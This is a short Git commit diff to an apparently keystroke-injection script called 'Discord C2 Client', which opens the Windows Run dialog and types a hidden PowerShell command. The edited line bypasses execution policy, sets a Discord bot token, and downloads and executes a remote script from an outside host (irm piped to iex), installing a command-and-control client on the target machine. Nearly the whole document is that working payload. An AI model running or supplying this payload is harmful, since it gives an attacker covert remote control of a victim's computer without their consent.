Update Discord C2 Client.txt

This commit is contained in:
egieb
2025-06-18 15:04:14 +00:00
committed by GitHub
parent ebd86aa578
commit 560bc40a83

View File

@@ -17,6 +17,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tk = 'BOT_TOKEN'; irm https://bw0.cc/dcc2 | iex
STRING powershell -Ep Bypass -W H -C $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcc2)
ENTER